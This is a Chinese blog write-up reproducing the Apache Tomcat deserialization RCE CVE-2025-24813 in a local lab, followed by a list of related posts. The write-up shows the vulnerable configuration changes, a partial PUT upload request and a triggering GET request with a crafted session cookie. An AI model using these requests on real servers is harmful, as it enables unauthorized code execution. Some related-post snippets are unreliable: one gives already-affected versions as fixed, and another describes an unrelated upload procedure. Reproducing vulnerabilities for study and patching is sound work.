【漏洞复现】CVE-2025-24813:Apache Tomcat 远程代码执行漏洞

CVE-2025-24813:Apache Tomcat 远程代码执行漏洞复现
原创 已于 2025-04-22 16:40:19 修改 · 1.1k 阅读 · 17 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#apache #tomcat #java

于 2025-04-07 10:26:50 首次发布

免责声明

本文仅面向网络安全教育及技术交流,所涉漏洞分析禁止用于任何非法用途。读者须在合法授权环境下实验并严格遵守《网络安全法》等法律法规,由于传播、利用本公众号所发布的文章而造成的任何直接或者间接的后果及损失,均由行为人自行承担,本公众号不承担任何责任。

漏洞概况

Tomcat 是一个开源的、轻量级的 Web 应用服务器 和 Servlet 容器。它由 Apache 软件基金会下的 Jakarta 项目开发,是目前最流行的 Java Web 服务器之一。

Tomcat 在特定配置下存在反序列化漏洞。攻击者可通过构造恶意请求,利用文件会话持久化机制将恶意序列化数据写入服务器,并在后续请求中触发反序列化操作,从而导致远程代码执行。

该漏洞利用条件较为复杂,需同时满足以下四个条件:

  1. 应用中DefaultServlet 写入功能启用,该功能默认关闭
  2. 应用中Partial PUT 请求支持,能够将恶意的序列化数据写入到会话文件中,该功能默认开启
  3. 应用中文件会话持久化启用,需要额外配置
  4. 应用中存在反序列化利用链,此条件取决于业务实现是否依赖存在反序列化利用链的库

影响范围

  • 9.0.0.M1 <= tomcat <= 9.0.98
  • 10.1.0-M1 <= tomcat <= 10.1.34
  • 11.0.0-M1 <= tomcat <= 11.0.2

原理分析

Content-Range在 Tomcat 的HTTP PUT请求中主要用于实现大文件的分块传输。在文件上传未完成的情况下,内容会被临时存储在Tomcat的工作目录:$CATALINA_BASE/work/Catalina/localhost/ROOT
该漏洞的核心在于不完整PUT请求上传时的文件名处理机制:文件路径中的分隔符/会被转换为.。例如:访问/xxxxx/session会被解析为.xxxxx.session

因此整个漏洞的利用过程为:

  1. Tomcat的File会话存储默认路径同样位于:CATALINA_BASE/work/Catalina/localhost/ROOT
  2. 当存在反序列化利用链时,可以上传包含恶意序列化数据的文件
  3. 通过设置JSESSIONID=.xxxxx来触发漏洞

环境准备

首先我们在官网下载Tomcat的9.0.98版本

https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.98/bin/apache-tomcat-9.0.98-windows-x64.zip

在这里插入图片描述

我这里是用IDEA打开的项目,在\apache-tomcat-9.0.98\conf\context.xml中,将下面内容添加到<Context>中,作用是开启File文件会话存储

<Manager className="org.apache.catalina.session.PersistentManager">
<Store className="org.apache.catalina.session.FileStore"/>
</Manager>

在这里插入图片描述

\apache-tomcat-9.0.98\conf\web.xml中,将下面内容添加到<servlet>中,作用是取消只读,启用了写入功能

<init-param>
    <param-name>readonly</param-name>
    <param-value>false</param-value>
</init-param>

在这里插入图片描述

\apache-tomcat-9.0.98\webapps\ROOT\WEB-INF\目录下新增lib文件夹,然后将我们下载的Commons Collections 3.2.1.jar放入lib文件夹中,作用是增加一个可以利用的库

https://repo1.maven.org/maven2/commons-collections/commons-collections/3.2.1/commons-collections-3.2.1.jar

在这里插入图片描述

启动Tomcat服务

在这里插入图片描述

在这里插入图片描述

漏洞复现

这里我使用的是Yakit自带的Yso-Java Hack生成的恶意序列化Payload

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

使用以下数据包上传

注:Content-Range值需要与Content-Length值保持一致,且大于当前文件的长度。

PUT /xxxxx/session HTTP/1.1
Host: localhost:8080
Content-Length: 1000
Content-Range: bytes 0-1000/1200

{{反序列化文件内容)}}

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

使用以下PoC触发

GET / HTTP/1.1
Host: localhost:8080
Cookie: JSESSIONID=.xxxxx

在这里插入图片描述

修复方案

Apache官方已发布漏洞公告,可下载补丁更新:
https://lists.apache.org/thread/j5fkjv2k477os90nczf2v9l61fb0kkgq

参考:

https://forum.butian.net/article/674
https://mp.weixin.qq.com/s/DM9-TU3QlfdeyhsyVoWt9Q

欢迎关注微信公众号:不安全的Amble
在这里插入图片描述

漏洞复现Apache Tomcat 远程代码执行CVE-2025-24813
李同學的安全圈
03-28 967
Apache Tomcat 是一个开源的、轻量级的 Java Servlet 容器和 Web 服务器,由Apache软件基金会开发和维护,支持运行 Java Servlet、JavaServer Pages (JSP) 和其他基于 Java 的 Web 应用程序,广泛用于开发和部署企业级 Web 应用。
Apache Tomcat 远程代码执行漏洞复现(CVE-2025-24813)(附脚本)
iSee857的博客
03-13 3944
漏洞源于 Tomcat DefaultServlet 处理 partial PUT 请求(基于 `Content-Range` 头的 HTTP PUT 请求)时的 临时文件命名逻辑不安全,导致攻击者可以通过构造特殊的请求路径,访问或写入安全敏感文件。(CVE-2025-24813
Goby 漏洞安全通告| Apache Tomcat 远程命令执行(CVE-2025-24813)
m0_46699477的博客
03-12 2514
Apache Tomcat 是一个开源的 Java Servlet 容器,广泛用于运行基于 Java 的 Web 应用程序。该漏洞CVE-2025-24813)允许远程攻击者通过特定的恶意请求在目标系统上执行任意命令,从而完全控制受影响的服务器。 满足以下条件,攻击者可以远程代码执行(RCE): 1. DefaultServlet 启用了写入权限(默认情况下禁用)。 2. 服务器启用了partial PUT(默认启用)。 3. Tomcat 使用了基于文件的 Session 持久化机制(非默认配置,默认为
tomcat常见漏洞
qq_46416934的博客
06-18 3620
目录前言一、任意文件上传1.1 影响版本1.2 初始配置1.3 漏洞详情二、CVE-2020-1938?文件包含漏洞2.1 影响版本2.2 漏洞详情三、未授权弱口令+war后门上传总结tomcatapache一样是一个免费的服务器,主要用于jsp框架的网站,可以看作是apache的一个扩展,但是运行的时候和apache属于不同的进程。本文主要介绍tomcat的未授权访问、任意文件上传、文件包含漏洞tomcat 7.0.x --------------cve-2017-12615需要在windows下将配
Apache Tomcat文件包含漏洞复现(详细教程)
最新发布
2509_93930198的博客
10-28 1073
TomcatApache开源组织开发的用于处理HTTP服务的项目,两者都是免费的,都可以做为独立的Web服务器运行。Apache Tomcat服务器存在文件包含漏洞,攻击者可利用该漏洞读取或包含 Tomcat 上所有 webapp 目录下的任意文件,如:webapp 配置文件或源代码等。Apache Tomcat服务器通过Connector连接器组件与客户程序建立连接,Connector表示接收请求并返回响应的端点。即Connector组件负责接收客户的请求,以及把Tomcat服务器的响应结果发送给客户。
一文弄懂 Apache Tomcat
程序员进阶之路
07-26 1983
Tomcat的两个重要身份 1. **http服务器** 2. **Tomcat是⼀个Servlet容器**
Tomcat Session 反序列化漏洞CVE-2025-24813
玄道的网安博客
03-14 1882
核心逻辑在这里,以 range.length作为文件的长度,range.start作为起始点开始处理流,这也是为什么 length 必须要大于 body 的总长度,不然无法将内容完全上传。这部分是反序列化触发点,CVE-2020-9484出自这里,所以不难看出这其实是一个组合漏洞,当时CVE-2020-9484是因为存在目录穿越问题所以可以穿越加载一个自定义的序列化文件。CVE-2017-12615、CVE-2024-50379均涉及该方法,也就是 doPUT,其实逻辑很简单,如以下代码。
图片服务器
whinsist的专栏
07-05 326
1.图片服务器源码 2.图片服务器tomcat配置(tomcat/config/web.xml)         default         org.apache.catalina.servlets.DefaultServlet                     debug             0
漏洞预警:Apache Tomcat 远程代码执行高危漏洞CVE-2025-24813】安全预警
weixin_47946540的博客
05-15 604
Apache Tomcat 是美国阿帕奇(Apache)基金会一款广泛使用的轻量级 Web 应用服务器,主要用于实现对 Servlet 和 JavaServer Page(JSP)的支持。此次漏洞的产生源于 Apache Tomcat 反序列化机制未对用户输入进行严格验证,导致攻击者能够通过构造恶意序列化对象绕过安全限制,进而实现远程恶意代码的执行,最终获取服务器的控制权。漏洞编号:【CVE-2025-24813】。
漏洞预警 | Apache Tomcat 存在远程代码执行漏洞CVE-2025-24813
C20220511的博客
03-14 777
Apache Tomcat 是一个Apache软件基金会属下Jakarta项目开发的开源的、轻量级的 Java Web 服务器 ,主要用于运行基于 Java Servlet 和 JavaServer Pages (JSP) 开发的 Web 应用程序,并提供了作为Web服务器的一些特有功能,如Tomcat管理和控制平台、安全局管理和Tomcat阀等。3、应用程序使用了 Tomcat 的基于文件的会话持久化功能,并采用默认的存储位置;③升级到 Apache Tomcat 9.0.99 或更高版本。
漏洞修复:Apache Tomcat 安全漏洞(CVE-2024-50379) | Apache Tomcat 安全漏洞(CVE-2024-52318)
专注于计算机研发知识和资讯分享
01-23 2294
解决方案:升级到最新版Tomcat
CVE-2025-24813 漏洞全解析|Apache Tomcat 关键路径绕过与RCE
syg6921008的博客
04-06 5598
Apache Tomcat 中一个关键的路径等效性(Path Equivalence)漏洞,允许未经身份验证的远程攻击者在特定配置下实现远程代码执行(RCE)、读取敏感文件,甚至篡改文件内容。该漏洞已在野外被观察到存在实际利用行为,影响范围广泛。CVE-2025-24813 是一次典型的“路径+反序列化+配置缺陷”复合型漏洞,表面上源于文件路径处理缺陷,实际利用则依赖于多个错误配置的叠加效应。边界可信假设失效、中间件权限设置失误、反序列化引擎暴露等老问题,在现代系统中依旧构成致命威胁。
Apache Tomcat RCE漏洞复现CVE-2025-24813
ANGEEK181203的博客
04-14 1149
例如 Content-Range: bytes 0-1000/1200 表示文件总大小是1200字节,本次上传的是前1001字节(0-1000),后续上传剩余部分(1001-1200)。使用 partial PUT 请求将恶意的序列化数据写入到会话文件中,在开启文件会话持久化(默认存储位置),并且在文件上传未完成的情况下,内容会被临时存储在 Tomcat 的工作目录work\Catalina\localhost\ROOT。2. 在conf/context.xml中,开启File文件会话存储。
Apache Tomcat 远程代码执行漏洞(CVE-2025-24813) 超详细!
热门推荐
欢迎来到我的博客,这里是我分享Python开发心得与信息安全探索的乐园。作为一名热衷于编程与安全的技术爱好者,我始终致力于在Python的世界里深耕细作,探索其强大的功能与无限的可能性。同时,信息安全也是我关注的重点,我深知在这个数字化时代,保护数据安全的
03-14 1万+
远程代码执行漏洞(CVE-2025-24813)源于 Apache Tomcat 的反序列化机制未对用户输入进行严格验证,攻击者可通过构造恶意序列化对象绕过安全限制,处理部分 PUT 请求时,攻击者利用临时文件路径处理中的缺陷(将路径分隔符"/"替换为“.”),通过特定条件(如启用默认 servlet 的写入功能)实现远程代码执行并控制服务器‌。‌将 Apache Tomcat 升级至安全版本(Tomcat 11.0.2+、10.1.34+、9.0.98+),以修复反序列化漏洞及 PUT 请求处理缺陷‌。
Tomcat漏洞
lhdbk______的博客
08-06 875
常见中间件漏洞
Tomcat漏洞详解
apple_74953689的博客
09-07 2250
Tomcat是一个开源的Servlet容器,由Apache软件基金会开发,用于托管。它实现了Java Servlet和JavaServer Pages(JSP)技术,并提供了一些特有的Web服务器功能,如管理和控制平台、安全域管理和阀等。
【安全漏洞CVE-2025-24813
宣晨光
03-12 1570
Apache Tomcat远程代码执行漏洞CVE-2025-24813)是一个严重的安全问题,它允许攻击者在特定条件下上传恶意Session文件并执行远程代码。以下是关于此漏洞的详细信息和建议的应对措施。
cve2025-24813复现和分析(含靶场搭建)
weixin_48152280的博客
06-19 1554
cve2025-24813复现和分析(含靶场搭建)
Apache Tomcat远程代码执行漏洞CVE-2025-24813复现
03-25
### Apache Tomcat CVE-2025-24813 远程代码执行漏洞复现 #### 漏洞概述 Apache Tomcat远程代码执行漏洞 (CVE-2025-24813) 存在于特定版本中,当满足某些条件时,攻击者可以利用该漏洞实现未授权的恶意代码执行并获取服务器权限。此漏洞的影响范围较广,涉及多个主要版本[^1]。 #### 影响版本 受影响的 Tomcat 版本如下: - `9.0.0.M1` ≤ Tomcat ≤ `9.0.98` - `10.1.0-M1` ≤ Tomcat ≤ `10.1.34` - `11.0.0-M1` ≤ Tomcat ≤ `11.0.2` 这些版本中的默认会话持久化机制和存储位置设置可能引入安全隐患[^3]。 #### 漏洞利用条件 要成功触发此漏洞,需满足以下条件: 1. **Servlet 写入功能启用**:Tomcat 应用程序启用了 servlet 文件写入功能(通常默认禁用)。 2. **默认会话管理器配置**:使用了 Tomcat 默认的会话持久化机制及其默认存储路径。 3. **依赖库存在反序列化漏洞**:如果应用环境中使用的第三方库存在可被利用的反序列化链,则可能导致进一步的安全威胁。 上述条件共同作用下,攻击者可以通过精心构造的数据包,在目标系统的指定目录下创建文件或执行命令。 #### 环境准备 为了验证漏洞是否存在以及其具体表现形式,需要搭建测试环境。以下是详细的环境配置说明: ##### 软件安装与部署 1. 下载并解压对应版本的 Apache Tomcat 安装包至本地机器上。 - 受影响版本列表见前文描述。 2. 修改 `conf/web.xml` 配置文件以允许 Servlet 功能扩展。例如,添加支持动态资源加载的相关参数: ```xml <init-param> <param-name>listings</param-name> <param-value>true</param-value> </init-param> ``` 3. 启动服务端口监听,默认为 8080 或其他自定义端口号。 ##### 测试工具选用 推荐采用 Burp Suite Pro 或 Metasploit Framework 对目标主机发起模拟攻击请求;也可以编写简单的 Python/Java 脚本来完成基本的功能检测。 #### 实际操作流程 按照以下顺序依次尝试重现问题现象: 1. 构造 HTTP 请求数据包发送给目标站点 `/manager/html/upload?file=` 接口地址; 2. 如果返回状态码正常且无错误提示信息则表明上传过程顺利完成; 3. 查看工作区目录结构变化情况确认是否有新生成的目标文件对象位于预期路径之下 (`apache-tomcat-\work\Catalina\localhost\ROOT`) [^2]. 注意:以上仅为理论分析指导用途,请勿非法入侵任何网络资产! --- ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值